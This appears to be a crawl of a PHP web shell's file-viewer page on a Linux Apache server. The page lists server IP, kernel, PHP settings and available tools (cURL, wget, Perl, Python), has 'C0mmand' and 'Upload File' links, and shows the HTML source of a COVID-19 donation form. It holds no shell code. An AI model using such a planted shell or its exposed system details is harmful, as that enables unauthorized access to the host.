Server IP : 172.16.15.8 / Your IP : 18.119.105.155 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jesimmons/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<HTML> <HEAD> <link href='https://fonts.googleapis.com/css?family=Fjalla One' rel='stylesheet'> <TITLE>COVID-19 Information Page </TITLE> <style> body { font-family: 'Fjalla One'; background-image: url('FPBACKGROUND.jpg'); background-repeat: no-repeat; background-size: 100% 100%; } </style> </HEAD> <BODY> <CENTER> <Font color=white size=4> <h2> Donation Form </h2> <hr> <table> <tr> <th></th> <th></th> </tr> <Form action= DonationInfo.php method=post> <tr> <td><font color=white>Input Name:</font></td> <td><input type=text size=20 name=fullName></td> </tr> <tr> <td><font color=white>Email:</font></td> <td><input type=text size=40 name=email></td> </tr> <tr> <td><font color=white>Donation Amount:</font></td> <td><input type=text size=5 name=money></td> </tr> <tr> <td><font color=white>Where would you like to donate to:</font></td> <td><INPUT type=radio name=donorg value=World_Health_Organization checked><font color=white> World Health Organization</font></br> <INPUT type=radio name=donorg value=Center_for_Disease_Control><font color=white> Center for Disease Control</font></br> <INPUT type=radio name=donorg value=International_Rescue_Committee><font color=white> International Rescue Committee</font></br> <INPUT type=radio name=donorg value=Red_Cross> <font color=white>Red Cross</font></br> <INPUT type=radio name=donorg value=Project_CURE><font color=white> Project CURE</font></br></td> </table> <HR> <input type=submit value=Submit> <input type=reset value=Reset> </Form> </CENTER>